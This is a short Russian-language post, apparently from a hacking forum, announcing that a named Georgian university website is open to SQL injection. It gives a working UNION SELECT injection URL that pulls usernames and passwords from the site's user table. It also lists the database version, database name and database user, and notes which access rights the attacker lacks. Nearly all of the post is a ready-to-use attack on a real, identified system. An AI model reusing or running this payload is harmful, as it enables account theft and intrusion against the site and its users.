http://www.ssmu.edu.ge уязвим для sql-injection

http://www.ssmu.edu.ge/t.php?lang=eng&id=5%27+and+0+union+select+1,2,3,4, 5,concat_ws(0x3a,user,password),7,8,9+from+user+li mit+0,1+--+
Список пользователей и их паролей.

Версия БД: 4.1.22-standard-log
Имя БД: ssmuedug_ssmu
Пользователь БД: ssmuedug_ssmu@localhost

Доступа к mysql.user нет. Прав на чтения файлов нет. information_schema нет( в связи с версией БД)